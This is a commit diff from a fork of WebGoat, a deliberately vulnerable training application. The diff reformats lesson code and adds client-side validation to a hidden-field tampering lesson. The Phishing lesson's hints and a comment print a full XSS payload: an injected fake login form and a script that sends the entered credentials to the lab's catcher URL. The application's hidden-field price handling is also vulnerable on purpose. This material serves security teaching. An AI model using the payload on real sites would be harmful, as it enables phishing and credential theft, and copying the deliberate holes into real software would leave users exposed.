dubey/WebGoat
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Added client side validation to HiddenFieldTampering.java, added a new ECS makeButton with a OnClick function, corrected authorship in several files

Browse Source 
git-svn-id: http://webgoat.googlecode.com/svn/trunk@220 4033779f-a91e-0410-96ef-6bf7bf53c507
This commit is contained in:
mayhew64 2008-01-09 13:28:07 +00:00
parent 3645564018
commit 84ca966ce5
9 changed files with 1354 additions and 1336 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

2
webgoat/main/project/JavaSource/org/owasp/webgoat/lessons/BlindSqlInjection.java
View File

@ -46,7 +46,7 @@ import org.owasp.webgoat.session.WebSession;
* For details, please see http://code.google.com/p/webgoat/
*
* @author Chuck Willis <a href="http://www.securityfoundry.com">Chuck's web
* site</a> (this lesson is heavily based on Jeff Williams' SQL
* site</a> (this lesson is heavily based on Bruce Mayhews' SQL
* Injection lesson
* @created January 14, 2005
*/

2
webgoat/main/project/JavaSource/org/owasp/webgoat/lessons/DOS_Login.java
View File

@ -53,7 +53,7 @@ import org.owasp.webgoat.session.ParameterNotFoundException;
*
* For details, please see http://code.google.com/p/webgoat/
*
* @author Jeff Williams <a href="http://www.aspectsecurity.com">Aspect Security</a>
* @author Bruce Mayhew <a href="http://code.google.com/p/webgoat">WebGoat</a>
* @created October 28, 2003
*/
public class DOS_Login extends LessonAdapter

98
webgoat/main/project/JavaSource/org/owasp/webgoat/lessons/HiddenFieldTampering.java
View File

@ -2,9 +2,11 @@ package org.owasp.webgoat.lessons;
import java.util.ArrayList;
import java.util.List;
import java.util.regex.Pattern;
import org.apache.ecs.Element;
import org.apache.ecs.ElementContainer;
import org.apache.ecs.StringElement;
import org.apache.ecs.html.A;
import org.apache.ecs.html.B;
import org.apache.ecs.html.BR;
@ -50,11 +52,16 @@ import org.owasp.webgoat.session.WebSession;
* For details, please see http://code.google.com/p/webgoat/
*
* @author Jeff Williams <a href="http://www.aspectsecurity.com">Aspect Security</a>
* @author Bruce Mayhew <a href="http://code.google.com/p/webgoat">WebGoat</a>
* @created October 28, 2003
*/
public class HiddenFieldTampering extends LessonAdapter
{
public final static A ASPECT_LOGO = new A().setHref("http://www.aspectsecurity.com").addElement(new IMG("images/logos/aspect.jpg").setAlt("Aspect Security").setBorder(0).setHspace(0).setVspace(0));
public final static A ASPECT_LOGO =
new A().setHref("http://www.aspectsecurity.com").addElement(
new IMG("images/logos/aspect.jpg")
.setAlt("Aspect Security").setBorder(0)
.setHspace(0).setVspace(0));
private final static String PRICE = "Price";
@ -62,37 +69,56 @@ public class HiddenFieldTampering extends LessonAdapter
private final static String PRICE_TV_HACKED = "9.99";
String regex = "^" + PRICE_TV + "$"; // obviously the "." will match any char - any interesting exploit!
Pattern pattern1 = Pattern.compile(regex);
String lineSep = System.getProperty("line.separator");
String script =
"<SCRIPT>" + lineSep + "regex=/" + regex + "/;" + "function validate() { " + lineSep
+ "if (!regex.test(document.form." + PRICE + ".value)) {alert('Data tampering is disallowed'); "
+" document.form." + PRICE + ".value = " + PRICE_TV + ";}"
+ lineSep + "else document.form.submit();" + lineSep + "} " + lineSep + "</SCRIPT>" + lineSep;
/**
* Constructor for the HiddenFieldScreen object
*/
public HiddenFieldTampering()
{}
{
}
/**
* Description of the Method
*
* @param s Description of the Parameter
* @param s
* Description of the Parameter
* @return Description of the Return Value
*/
protected Element createContent(WebSession s)
{
ElementContainer ec = new ElementContainer();
ec.addElement(new StringElement(script));
float quantity;
float total;
String price = PRICE_TV;
try
{
String price = s.getParser().getRawParameter(PRICE, PRICE_TV);
float quantity = s.getParser().getFloatParameter("QTY", 1.0f);
float total = quantity * Float.parseFloat(price);
price = s.getParser().getRawParameter(PRICE, PRICE_TV);
quantity = s.getParser().getFloatParameter("QTY", 1.0f);
total = quantity * Float.parseFloat(price);
}
catch (Exception e)
{
s.setMessage("Invaild data " + this.getClass().getName());
price = PRICE_TV;
quantity = 1.0f;
total = quantity * Float.parseFloat(PRICE_TV);
}
if (price.equals(PRICE_TV))
{
ec.addElement(new Center().addElement(new H1()
.addElement("Shopping Cart ")));
ec.addElement(new Center().addElement(new H1().addElement("Shopping Cart ")));
ec.addElement(new BR());
Table t = new Table().setCellSpacing(0).setCellPadding(2)
.setBorder(1).setWidth("90%").setAlign("center");
Table t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(1).setWidth("90%").setAlign("center");
if (s.isColor())
{
@ -100,26 +126,22 @@ public class HiddenFieldTampering extends LessonAdapter
}
TR tr = new TR();
tr.addElement(new TH().addElement(
"Shopping Cart Items -- To Buy Now").setWidth("80%"));
tr.addElement(new TH().addElement("Shopping Cart Items -- To Buy Now").setWidth("80%"));
tr.addElement(new TH().addElement("Price:").setWidth("10%"));
tr.addElement(new TH().addElement("Quantity:").setWidth("3%"));
tr.addElement(new TH().addElement("Total").setWidth("7%"));
t.addElement(tr);
tr = new TR();
tr.addElement(new TD()
.addElement("56 inch HDTV (model KTV-551)"));
tr.addElement(new TD().addElement("56 inch HDTV (model KTV-551)"));
tr.addElement(new TD().addElement(PRICE_TV).setAlign("right"));
tr.addElement(new TD().addElement(
new Input(Input.TEXT, "QTY", 1)).setAlign("right"));
tr.addElement(new TD().addElement(new Input(Input.TEXT, "QTY", 1)).setAlign("right"));
tr.addElement(new TD().addElement("$" + total));
t.addElement(tr);
ec.addElement(t);
t = new Table().setCellSpacing(0).setCellPadding(2)
.setBorder(0).setWidth("90%").setAlign("center");
t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(0).setWidth("90%").setAlign("center");
if (s.isColor())
{
@ -128,13 +150,10 @@ public class HiddenFieldTampering extends LessonAdapter
ec.addElement(new BR());
tr = new TR();
tr.addElement(new TD()
.addElement("The total charged to your credit card:"));
tr.addElement(new TD().addElement("The total charged to your credit card:"));
tr.addElement(new TD().addElement("$" + total));
tr.addElement(new TD().addElement(ECSFactory
.makeButton("Update Cart")));
tr.addElement(new TD().addElement(ECSFactory
.makeButton("Purchase")));
tr.addElement(new TD().addElement(ECSFactory.makeButton("Update Cart")));
tr.addElement(new TD().addElement(ECSFactory.makeButton("Purchase", "validate()")));
t.addElement(tr);
ec.addElement(t);
@ -143,8 +162,7 @@ public class HiddenFieldTampering extends LessonAdapter
ec.addElement(input);
ec.addElement(new BR());
}
else
} else
{
if (!price.toString().equals(PRICE_TV))
{
@ -154,21 +172,12 @@ public class HiddenFieldTampering extends LessonAdapter
ec.addElement(new P().addElement("Your total price is:"));
ec.addElement(new B("$" + total));
ec.addElement(new BR());
ec
.addElement(new P()
.addElement("This amount will be charged to your credit card immediately."));
}
}
catch (Exception e)
{
s.setMessage("Error generating " + this.getClass().getName());
e.printStackTrace();
ec.addElement(new P().addElement("This amount will be charged to your credit card immediately."));
}
return (ec);
}
/**
* DOCUMENT ME!
*
@ -179,7 +188,6 @@ public class HiddenFieldTampering extends LessonAdapter
return Category.UNVALIDATED_PARAMETERS;
}
/**
* Gets the hints attribute of the HiddenFieldScreen object
*
@ -188,10 +196,8 @@ public class HiddenFieldTampering extends LessonAdapter
protected List<String> getHints(WebSession s)
{
List<String> hints = new ArrayList<String>();
hints
.add("This application is using hidden fields to transmit price information to the server.");
hints
.add("Use a program to intercept and change the value in the hidden field.");
hints.add("This application is using hidden fields to transmit price information to the server.");
hints.add("Use a program to intercept and change the value in the hidden field.");
hints
.add("Use <A href=\"http://www.owasp.org/development/webscarab\">WebScarab</A> to change the price of the TV from "
+ PRICE_TV + " to " + PRICE_TV_HACKED + ".");
@ -199,7 +205,6 @@ public class HiddenFieldTampering extends LessonAdapter
return hints;
}
/**
* Gets the instructions attribute of the HiddenFieldTampering object
*
@ -207,20 +212,19 @@ public class HiddenFieldTampering extends LessonAdapter
*/
public String getInstructions(WebSession s)
{
String instructions = "Try to purchase the HDTV for less than the purchase price, if you have not done so already.";
String instructions =
"Try to purchase the HDTV for less than the purchase price, if you have not done so already.";
return (instructions);
}
private final static Integer DEFAULT_RANKING = new Integer(50);
protected Integer getDefaultRanking()
{
return DEFAULT_RANKING;
}
/**
* Gets the title attribute of the HiddenFieldScreen object
*

2
webgoat/main/project/JavaSource/org/owasp/webgoat/lessons/HttpBasics.java
View File

@ -39,7 +39,7 @@ import org.owasp.webgoat.session.WebSession;
*
* For details, please see http://code.google.com/p/webgoat/
*
* @author Jeff Williams <a href="http://www.aspectsecurity.com">Aspect Security</a>
* @author Bruce Mayhew <a href="http://code.google.com/p/webgoat">WebGoat</a>
* @created October 28, 2003
*/
public class HttpBasics extends LessonAdapter

168
webgoat/main/project/JavaSource/org/owasp/webgoat/lessons/Phishing.java
View File

@ -61,28 +61,28 @@ public class Phishing extends LessonAdapter
protected final static String SEARCH = "Username";
private String searchText;
/**
* Description of the Method
*
* @param s Description of the Parameter
* @param s
* Description of the Parameter
* @return Description of the Return Value
*/
private boolean postedCredentials(WebSession s)
{
String postedToCookieCatcher = getLessonTracker(s).getLessonProperties()
.getProperty(Catcher.PROPERTY, Catcher.EMPTY_STRING);
String postedToCookieCatcher =
getLessonTracker(s).getLessonProperties().getProperty(Catcher.PROPERTY, Catcher.EMPTY_STRING);
// <START_OMIT_SOURCE>
return (!postedToCookieCatcher.equals(Catcher.EMPTY_STRING));
// <END_OMIT_SOURCE>
}
/**
* Description of the Method
*
* @param s Description of the Parameter
* @param s
* Description of the Parameter
* @return Description of the Return Value
*/
protected Element createContent(WebSession s)
@ -109,14 +109,12 @@ public class Phishing extends LessonAdapter
return (ec);
}
protected Element makeSearch(WebSession s)
{
ElementContainer ec = new ElementContainer();
ec.addElement(new H1().addElement("WebGoat Search "));
Table t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(0)
.setAlign("center");
Table t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(0).setAlign("center");
TR tr = new TR();
tr.addElement(new TD().addElement("&nbsp;").setColSpan(2));
@ -127,11 +125,8 @@ public class Phishing extends LessonAdapter
}
tr = new TR();
tr
.addElement(new TH()
.addElement(
"This facility will search the WebGoat source.")
.setColSpan(2).setAlign("center"));
tr.addElement(new TH().addElement("This facility will search the WebGoat source.").setColSpan(2)
.setAlign("center"));
t.addElement(tr);
tr = new TR();
@ -165,7 +160,6 @@ public class Phishing extends LessonAdapter
return (ec);
}
/**
* Gets the hints attribute of the CluesScreen object
*
@ -174,63 +168,87 @@ public class Phishing extends LessonAdapter
protected List<String> getHints(WebSession s)
{
List<String> hints = new ArrayList<String>();
hints.add("Try adding HTML to the search field to create a fake authentication form.<BR>"
+ "Try to make the form look official.");
hints
.add("Try adding HTML to the search field to create a fake authentication form.<BR>" +
"Try to make the form look official.");
hints.add("Try: <BR> " +
"password&lt;form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;&lt;H3&gt;This feature requires account login:&lt;/H2" +
"&gt;&lt;br&gt;&lt;br&gt;Enter Username:&lt;br&gt;&lt;input type=&quot;text&quot; id=&quot;user&quot; " +
"name=&quot;user&quot;&gt;&lt;br&gt;Enter Password:&lt;br&gt;&lt;input type=&quot;password&quot; " +
"name = &quot;pass&quot;&gt;&lt;br&gt;&lt;/form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;");
hints.add("Add functionality that can post a request, a button might work<BR><BR>" +
"After getting the button on the page, don't forget you will need to steal the credentials and post them to: <BR>" +
"http://localhost./WebGoat/capture/PROPERTY=yes&ADD_CREDENTIALS_HERE");
hints.add("Try: <BR> " +
"&lt;input type=&quot;submit&quot; name=&quot;login&quot; " +
"value=&quot;login&quot;&gt;"+
"<BR><BR>Solution for this hint:<BR><BR>" +
"password&lt;form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;&lt;H3&gt;This feature requires account login:&lt;/H2" +
"&gt;&lt;br&gt;&lt;br&gt;Enter Username:&lt;br&gt;&lt;input type=&quot;text&quot; id=&quot;user&quot; " +
"name=&quot;user&quot;&gt;&lt;br&gt;Enter Password:&lt;br&gt;&lt;input type=&quot;password&quot; " +
"name = &quot;pass&quot;&gt;&lt;br&gt;&lt;input type=&quot;submit&quot; name=&quot;login&quot; " +
"value=&quot;login&quot; onclick=&quot;hack()&quot;&gt;&lt;/form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;");
hints.add("Make the button perform an action on submit, <BR>" +
"adding an onclick=\"hack()\" might work<BR>"+
"Don't forget to add the hack() javascript function" +
"<BR><BR>Solution for this hint:<BR><BR>" +
"password&lt;form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;&lt;H3&gt;This feature requires account login:&lt;/H2" +
"&gt;&lt;br&gt;&lt;br&gt;Enter Username:&lt;br&gt;&lt;input type=&quot;text&quot; id=&quot;user&quot; " +
"name=&quot;user&quot;&gt;&lt;br&gt;Enter Password:&lt;br&gt;&lt;input type=&quot;password&quot; " +
"name = &quot;pass&quot;&gt;&lt;br&gt;&lt;input type=&quot;submit&quot; name=&quot;login&quot; " +
"value=&quot;login&quot; onclick=&quot;hack()&quot;&gt;&lt;/form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;");
hints.add("You need to create the hack() function. This function will pull the credentials from the " +
"webpage and post them to the WebGoat catcher servlet. <BR>" +
"<BR> Some useful code snippets:<UL>" +
"<LI>doucument.forms[0].user.value - will access the user field" +
"<LI>XssImage = new Image(); XssImage.src=SOME_URL = will perform a post" +
"<LI>javascript string concatentation uses a \"+\" </UL>" +
"<BR><BR>Solution for this hint():<BR><BR>" +
"password&lt;script&gt;function hack(){ alert(&quot;Had this been a real attack... Your credentials were just stolen." +
"\nUser Name = &quot; + document.forms(0).user.value + &quot;\nPassword = &quot; + document.forms(0).pass.value); " +
"XSSImage=new Image; XSSImage.src=&quot;http://localhost./WebGoat/catcher?PROPERTY=yes&amp;user=&quot;+" +
"document.forms(0).user.value + &quot;&amp;password=&quot; + document.forms(0).pass.value + &quot;&quot;;}" +
"&lt;/script&gt;");
hints.add("Complete solution for this lesson:<BR><BR>" +
"password&lt;script&gt;function hack(){ alert(&quot;Had this been a real attack... Your credentials were just stolen." +
"\nUser Name = &quot; + document.forms(0).user.value + &quot;\nPassword = &quot; + document.forms(0).pass.value); " +
"XSSImage=new Image; XSSImage.src=&quot;http://localhost./WebGoat/catcher?PROPERTY=yes&amp;user=&quot;+" +
"document.forms(0).user.value + &quot;&amp;password=&quot; + document.forms(0).pass.value + &quot;&quot;;}" +
"&lt;/script&gt;&lt;form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;&lt;H3&gt;This feature requires account login:&lt;/H2" +
"&gt;&lt;br&gt;&lt;br&gt;Enter Username:&lt;br&gt;&lt;input type=&quot;text&quot; id=&quot;user&quot; " +
"name=&quot;user&quot;&gt;&lt;br&gt;Enter Password:&lt;br&gt;&lt;input type=&quot;password&quot; " +
"name = &quot;pass&quot;&gt;&lt;br&gt;&lt;input type=&quot;submit&quot; name=&quot;login&quot; " +
"value=&quot;login&quot; onclick=&quot;hack()&quot;&gt;&lt;/form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;");
.add("Try: <BR> "
+ "password&lt;form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;&lt;H3&gt;This feature requires account login:&lt;/H2"
+ "&gt;&lt;br&gt;&lt;br&gt;Enter Username:&lt;br&gt;&lt;input type=&quot;text&quot; id=&quot;user&quot; "
+ "name=&quot;user&quot;&gt;&lt;br&gt;Enter Password:&lt;br&gt;&lt;input type=&quot;password&quot; "
+ "name = &quot;pass&quot;&gt;&lt;br&gt;&lt;/form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;");
hints
.add("Add functionality that can post a request, a button might work<BR><BR>"
+ "After getting the button on the page, don't forget you will need to steal the credentials and post them to: <BR>"
+ "http://localhost./WebGoat/capture/PROPERTY=yes&ADD_CREDENTIALS_HERE");
hints
.add("Try: <BR> "
+ "&lt;input type=&quot;submit&quot; name=&quot;login&quot; "
+ "value=&quot;login&quot;&gt;"
+ "<BR><BR>Solution for this hint:<BR><BR>"
+ "password&lt;form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;&lt;H3&gt;This feature requires account login:&lt;/H2"
+ "&gt;&lt;br&gt;&lt;br&gt;Enter Username:&lt;br&gt;&lt;input type=&quot;text&quot; id=&quot;user&quot; "
+ "name=&quot;user&quot;&gt;&lt;br&gt;Enter Password:&lt;br&gt;&lt;input type=&quot;password&quot; "
+ "name = &quot;pass&quot;&gt;&lt;br&gt;&lt;input type=&quot;submit&quot; name=&quot;login&quot; "
+ "value=&quot;login&quot; onclick=&quot;hack()&quot;&gt;&lt;/form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;");
hints
.add("Make the button perform an action on submit, <BR>"
+ "adding an onclick=\"hack()\" might work<BR>"
+ "Don't forget to add the hack() javascript function"
+ "<BR><BR>Solution for this hint:<BR><BR>"
+ "password&lt;form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;&lt;H3&gt;This feature requires account login:&lt;/H2"
+ "&gt;&lt;br&gt;&lt;br&gt;Enter Username:&lt;br&gt;&lt;input type=&quot;text&quot; id=&quot;user&quot; "
+ "name=&quot;user&quot;&gt;&lt;br&gt;Enter Password:&lt;br&gt;&lt;input type=&quot;password&quot; "
+ "name = &quot;pass&quot;&gt;&lt;br&gt;&lt;input type=&quot;submit&quot; name=&quot;login&quot; "
+ "value=&quot;login&quot; onclick=&quot;hack()&quot;&gt;&lt;/form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;");
hints
.add("You need to create the hack() function. This function will pull the credentials from the "
+ "webpage and post them to the WebGoat catcher servlet. <BR>"
+ "<BR> Some useful code snippets:<UL>"
+ "<LI>doucument.forms[0].user.value - will access the user field"
+ "<LI>XssImage = new Image(); XssImage.src=SOME_URL = will perform a post"
+ "<LI>javascript string concatentation uses a \"+\" </UL>"
+ "<BR><BR>Solution for this hint():<BR><BR>"
+ "password&lt;script&gt;function hack(){ alert(&quot;Had this been a real attack... Your credentials were just stolen."
+ "\nUser Name = &quot; + document.forms(0).user.value + &quot;\nPassword = &quot; + document.forms(0).pass.value); "
+ "XSSImage=new Image; XSSImage.src=&quot;http://localhost./WebGoat/catcher?PROPERTY=yes&amp;user=&quot;+"
+ "document.forms(0).user.value + &quot;&amp;password=&quot; + document.forms(0).pass.value + &quot;&quot;;}"
+ "&lt;/script&gt;");
hints
.add("Complete solution for this lesson:<BR><BR>"
+ "password&lt;script&gt;function hack(){ alert(&quot;Had this been a real attack... Your credentials were just stolen."
+ "\nUser Name = &quot; + document.forms(0).user.value + &quot;\nPassword = &quot; + document.forms(0).pass.value); "
+ "XSSImage=new Image; XSSImage.src=&quot;http://localhost./WebGoat/catcher?PROPERTY=yes&amp;user=&quot;+"
+ "document.forms(0).user.value + &quot;&amp;password=&quot; + document.forms(0).pass.value + &quot;&quot;;}"
+ "&lt;/script&gt;&lt;form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;&lt;H3&gt;This feature requires account login:&lt;/H2"
+ "&gt;&lt;br&gt;&lt;br&gt;Enter Username:&lt;br&gt;&lt;input type=&quot;text&quot; id=&quot;user&quot; "
+ "name=&quot;user&quot;&gt;&lt;br&gt;Enter Password:&lt;br&gt;&lt;input type=&quot;password&quot; "
+ "name = &quot;pass&quot;&gt;&lt;br&gt;&lt;input type=&quot;submit&quot; name=&quot;login&quot; "
+ "value=&quot;login&quot; onclick=&quot;hack()&quot;&gt;&lt;/form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;");
/**
* password<script>function hack(){ alert("Had this been a real attack... Your credentials were just stolen.\nUser Name = " + document.forms(0).user.value + "\nPassword = " + document.forms(0).pass.value); XSSImage=new Image; XSSImage.src="http://localhost./WebGoat/catcher?PROPERTY=yes&user="+document.forms(0).user.value + "&password=" + document.forms(0).pass.value + "";}</script><form><br><br><HR><H3>This feature requires account login:</H2><br><br>Enter Username:<br><input type="text" id="user" name="user"><br>Enter Password:<br><input type="password" name = "pass"><br><input type="submit" name="login" value="login" onclick="hack()"></form><br><br><HR> <!--
* password<script>function hack(){ alert("Had this been a real
* attack... Your credentials were just stolen.\nUser Name = " +
* document.forms(0).user.value + "\nPassword = " +
* document.forms(0).pass.value); XSSImage=new Image;
* XSSImage.src="http://localhost./WebGoat/catcher?PROPERTY=yes&user="+document.forms(0).user.value +
* "&password=" + document.forms(0).pass.value + "";}</script><form><br>
* <br>
* <HR>
* <H3>This feature requires account login:</H2>
* <br>
* <br>
* Enter Username:<br>
* <input type="text" id="user" name="user"><br>
* Enter Password:<br>
* <input type="password" name = "pass"><br>
* <input type="submit" name="login" value="login" onclick="hack()"></form><br>
* <br>
* <HR>
* <!--
*
*/
return hints;
}
/**
* Gets the instructions attribute of the XssSearch object
*
@ -238,26 +256,25 @@ public class Phishing extends LessonAdapter
*/
public String getInstructions(WebSession s)
{
String instructions = "This lesson is an example of how a website might support a phishing attack<BR><BR>" +
"Below is an example of a standard search feature.<br>" +
"Using XSS and HTML insertion, your goal is to: <UL>" +
"<LI>Insert html to that requests credentials" +
"<LI>Add javascript to actually collect the credentials" +
"<LI>Post the credentials to http://localhost./WebGoat/catcher?PROPERTY=yes...</UL> " +
"To pass this lesson, the credentials must be posted to the catcher servlet.<BR>";
String instructions =
"This lesson is an example of how a website might support a phishing attack<BR><BR>"
+ "Below is an example of a standard search feature.<br>"
+ "Using XSS and HTML insertion, your goal is to: <UL>"
+ "<LI>Insert html to that requests credentials"
+ "<LI>Add javascript to actually collect the credentials"
+ "<LI>Post the credentials to http://localhost./WebGoat/catcher?PROPERTY=yes...</UL> "
+ "To pass this lesson, the credentials must be posted to the catcher servlet.<BR>";
return (instructions);
}
private final static Integer DEFAULT_RANKING = new Integer(30);
protected Integer getDefaultRanking()
{
return DEFAULT_RANKING;
}
/**
* Gets the category attribute of the FailOpenAuthentication object
*
@ -268,7 +285,6 @@ public class Phishing extends LessonAdapter
return Category.XSS;
}
/**
* Gets the title attribute of the CluesScreen object
*

2
webgoat/main/project/JavaSource/org/owasp/webgoat/lessons/admin/UserAdminScreen.java
View File

@ -41,7 +41,7 @@ import org.owasp.webgoat.session.WebSession;
*
* For details, please see http://code.google.com/p/webgoat/
*
* @author Jeff Williams <a href="http://www.aspectsecurity.com">Aspect Security</a>
* @author Bruce Mayhew <a href="http://code.google.com/p/webgoat">WebGoat</a>
* @created October 28, 2003
*/
public class UserAdminScreen extends LessonAdapter

4
webgoat/main/project/JavaSource/org/owasp/webgoat/session/Course.java
View File

@ -419,8 +419,8 @@ public class Course
}
if(absoluteFile.startsWith("/lesson_solutions") && absoluteFile.endsWith(".html") && className.endsWith(fileName))
{
System.out.println("DEBUG: setting lesson solution file " + absoluteFile + " for lesson " + lesson.getClass().getName());
System.out.println("fileName: " + fileName + " == className: " + className );
//System.out.println("DEBUG: setting lesson solution file " + absoluteFile + " for lesson " + lesson.getClass().getName());
//System.out.println("fileName: " + fileName + " == className: " + className );
lesson.setLessonSolutionFileName(absoluteFile);
}
}

9
webgoat/main/project/JavaSource/org/owasp/webgoat/session/ECSFactory.java
View File

@ -116,6 +116,15 @@ public class ECSFactory
return (b);
}
public static Element makeButton(String text, String onClickFunction)
{
Input b = (Input)makeButton(text);
b.setOnClick(onClickFunction);
return (b);
}
/**
* Description of the Method

473
webgoat/main/project/JavaSource/org/owasp/webgoat/session/ParameterParser.java
View File

@ -43,27 +43,30 @@ import org.owasp.webgoat.util.HtmlEncoder;
public class ParameterParser
{
private final static String ALLOWED_CHARACTERS = "$()-?.@!,:;=//+"; // Don't allow #& specifically
private final static String ALLOWED_CHARACTERS = "$()-?.@!,:;=//+"; // Don't
// allow
// #&
// specifically
private ServletRequest request;
/**
* Constructs a new ParameterParser to handle the parameters of the given
* request.
*
*@param request the servlet request
* @param request
* the servlet request
*/
public ParameterParser(ServletRequest request)
{
this.request = request;
}
/**
* Description of the Method
*
*@param s Description of the Parameter
* @param s
* Description of the Parameter
* @return Description of the Return Value
*/
private String clean(String s)
@ -74,12 +77,10 @@ public class ParameterParser
{
char c = s.charAt(loop);
if (Character.isLetterOrDigit(c) || Character.isWhitespace(c)
|| (ALLOWED_CHARACTERS.indexOf(c) != -1))
if (Character.isLetterOrDigit(c) || Character.isWhitespace(c) || (ALLOWED_CHARACTERS.indexOf(c) != -1))
{
clean.append(c);
}
else
} else
{
clean.append('.');
}
@ -88,27 +89,28 @@ public class ParameterParser
return (clean.toString());
}
/**
* Gets the named parameter value as a boolean
*
*@param name the parameter name
* @param name
* the parameter name
* @return the parameter value as a boolean
*@exception ParameterNotFoundException if the parameter was not found
* @exception ParameterNotFoundException
* if the parameter was not found
*/
public boolean getBooleanParameter(String name)
throws ParameterNotFoundException
public boolean getBooleanParameter(String name) throws ParameterNotFoundException
{
return new Boolean(getStringParameter(name)).booleanValue();
}
/**
* Gets the named parameter value as a boolean, with a default. Returns the
* default value if the parameter is not found.
*
*@param name the parameter name
*@param def the default parameter value
* @param name
* the parameter name
* @param def
* the default parameter value
* @return the parameter value as a boolean, or the default
*/
public boolean getBooleanParameter(String name, boolean def)
@ -123,13 +125,15 @@ public class ParameterParser
}
}
/**
* Gets the booleanSubParameter attribute of the ParameterParser object
*
*@param first Description of the Parameter
*@param next Description of the Parameter
*@param def Description of the Parameter
* @param first
* Description of the Parameter
* @param next
* Description of the Parameter
* @param def
* Description of the Parameter
* @return The booleanSubParameter value
*/
public boolean getBooleanSubParameter(String first, String next, boolean def)
@ -144,30 +148,31 @@ public class ParameterParser
}
}
/**
* Gets the named parameter value as a byte
*
*@param name the parameter name
* @param name
* the parameter name
* @return the parameter value as a byte
*@exception ParameterNotFoundException if the parameter was not found
*@exception NumberFormatException if the parameter value could not be
* converted to a byte
* @exception ParameterNotFoundException
* if the parameter was not found
* @exception NumberFormatException
* if the parameter value could not be converted to a byte
*/
public byte getByteParameter(String name)
throws ParameterNotFoundException, NumberFormatException
public byte getByteParameter(String name) throws ParameterNotFoundException, NumberFormatException
{
return Byte.parseByte(getStringParameter(name));
}
/**
* Gets the named parameter value as a byte, with a default. Returns the
* default value if the parameter is not found or cannot be converted to a
* byte.
*
*@param name the parameter name
*@param def the default parameter value
* @param name
* the parameter name
* @param def
* the default parameter value
* @return the parameter value as a byte, or the default
*/
public byte getByteParameter(String name, byte def)
@ -182,14 +187,14 @@ public class ParameterParser
}
}
/**
* Gets the named parameter value as a char
*
*@param name the parameter name
* @param name
* the parameter name
* @return the parameter value as a char
*@exception ParameterNotFoundException if the parameter was not found or was
* the empty string
* @exception ParameterNotFoundException
* if the parameter was not found or was the empty string
*/
public char getCharParameter(String name) throws ParameterNotFoundException
{
@ -198,20 +203,20 @@ public class ParameterParser
if (param.length() == 0)
{
throw new ParameterNotFoundException(name + " is empty string");
}
else
} else
{
return (param.charAt(0));
}
}
/**
* Gets the named parameter value as a char, with a default. Returns the
* default value if the parameter is not found.
*
*@param name the parameter name
*@param def the default parameter value
* @param name
* the parameter name
* @param def
* the default parameter value
* @return the parameter value as a char, or the default
*/
public char getCharParameter(String name, char def)
@ -226,15 +231,14 @@ public class ParameterParser
}
}
/**
* Gets the classNameParameter attribute of the ParameterParser object
*
*@param name Description of the Parameter
* @param name
* Description of the Parameter
* @return The classNameParameter value
*/
public String getClassNameParameter(String name)
throws ParameterNotFoundException
public String getClassNameParameter(String name) throws ParameterNotFoundException
{
String p = getStringParameter(name);
StringTokenizer st = new StringTokenizer(p);
@ -242,14 +246,15 @@ public class ParameterParser
return (st.nextToken().trim());
}
// FIXME: check for [a-zA-Z].([a-zA-Z])*
/**
* Gets the classNameParameter attribute of the ParameterParser object
*
*@param name Description of the Parameter
*@param def Description of the Parameter
* @param name
* Description of the Parameter
* @param def
* Description of the Parameter
* @return The classNameParameter value
*/
public String getClassNameParameter(String name, String def)
@ -264,29 +269,30 @@ public class ParameterParser
}
}
/**
* Gets the named parameter value as a double
*
*@param name the parameter name
* @param name
* the parameter name
* @return the parameter value as a double
*@exception ParameterNotFoundException if the parameter was not found
*@exception NumberFormatException if the parameter could not be
* converted to a double
* @exception ParameterNotFoundException
* if the parameter was not found
* @exception NumberFormatException
* if the parameter could not be converted to a double
*/
public double getDoubleParameter(String name)
throws ParameterNotFoundException, NumberFormatException
public double getDoubleParameter(String name) throws ParameterNotFoundException, NumberFormatException
{
return new Double(getStringParameter(name)).doubleValue();
}
/**
* Gets the named parameter value as a double, with a default. Returns the
* default value if the parameter is not found.
*
*@param name the parameter name
*@param def the default parameter value
* @param name
* the parameter name
* @param def
* the default parameter value
* @return the parameter value as a double, or the default
*/
public double getDoubleParameter(String name, double def)
@ -301,29 +307,30 @@ public class ParameterParser
}
}
/**
* Gets the named parameter value as a float
*
*@param name the parameter name
* @param name
* the parameter name
* @return the parameter value as a float
*@exception ParameterNotFoundException if the parameter was not found
*@exception NumberFormatException if the parameter could not be
* converted to a float
* @exception ParameterNotFoundException
* if the parameter was not found
* @exception NumberFormatException
* if the parameter could not be converted to a float
*/
public float getFloatParameter(String name)
throws ParameterNotFoundException, NumberFormatException
public float getFloatParameter(String name) throws ParameterNotFoundException, NumberFormatException
{
return new Float(getStringParameter(name)).floatValue();
}
/**
* Gets the named parameter value as a float, with a default. Returns the
* default value if the parameter is not found.
*
*@param name the parameter name
*@param def the default parameter value
* @param name
* the parameter name
* @param def
* the default parameter value
* @return the parameter value as a float, or the default
*/
public float getFloatParameter(String name, float def)
@ -338,13 +345,14 @@ public class ParameterParser
}
}
/**
* Gets the named parameter value as an IP String, with a default. Returns the
* default value if the parameter is not found or is the empty string.
* Gets the named parameter value as an IP String, with a default. Returns
* the default value if the parameter is not found or is the empty string.
*
*@param name the parameter name
*@param def the default parameter value
* @param name
* the parameter name
* @param def
* the default parameter value
* @return the parameter value as a String, or the default
*/
